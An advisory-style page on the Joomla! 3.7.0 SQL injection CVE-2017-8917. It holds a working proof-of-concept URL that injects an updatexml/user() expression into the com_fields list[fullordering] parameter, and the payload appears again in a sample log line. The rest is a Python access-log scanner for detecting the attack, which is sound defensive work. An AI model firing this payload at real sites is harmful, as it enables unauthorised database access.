Joomla! 3.7.0 SQL Injection (CVE-2017-8917)
Official
https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8917
Affected Version
Joomla! 3.7.0
PoC
Requesting the following URL directly returns the database user name in the error output:
http://foo.com/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
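Added detection example (not part of the original advisory): scan web-server access logs for com_fields requests whose list[fullordering] parameter is not a plain "column ASC|DESC" sort expression, which is the shape of the PoC above. The sample log lines are constructed, and the allowed-value pattern is an assumption about how Joomla list views build their sort parameter, not taken from the Joomla source.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the original page): one benign
# sort request and one carrying the CVE-2017-8917 injection pattern.
SAMPLE_LOG = """\
203.0.113.5 - - [01/May/2017:10:00:01 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=a.ordering%20ASC HTTP/1.1" 200 5120
203.0.113.9 - - [01/May/2017:10:00:07 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1) HTTP/1.1" 500 812
"""

# Assumption: a legitimate fullordering value is "<column> [ASC|DESC]".
# Anything with parentheses, commas, quotes or operators is treated as suspect.
SAFE_ORDERING = re.compile(r"^[A-Za-z_][A-Za-z0-9_.]*(\s+(ASC|DESC))?$", re.IGNORECASE)

# Pull the request target out of a Common/Combined Log Format line.
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def suspicious_ordering(request_target: str):
    """Return the offending list[fullordering] value when the request targets
    com_fields with a sort value that is not a plain column/direction, else None."""
    qs = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    if qs.get("option") != ["com_fields"]:
        return None
    # parse_qs percent-decodes both keys and values, so an encoded
    # list%5Bfullordering%5D is normalised to the same key.
    for value in qs.get("list[fullordering]", []):
        if not SAFE_ORDERING.match(value.strip()):
            return value
    return None


def scan_log(text: str):
    """Return (client_ip, injected_value) for every suspicious line in the log."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        bad = suspicious_ordering(m.group(1))
        if bad is not None:
            hits.append((line.split()[0], bad))
    return hits


if __name__ == "__main__":
    for ip, value in scan_log(SAMPLE_LOG):
        print(f"{ip}: suspicious list[fullordering]={value!r}")
```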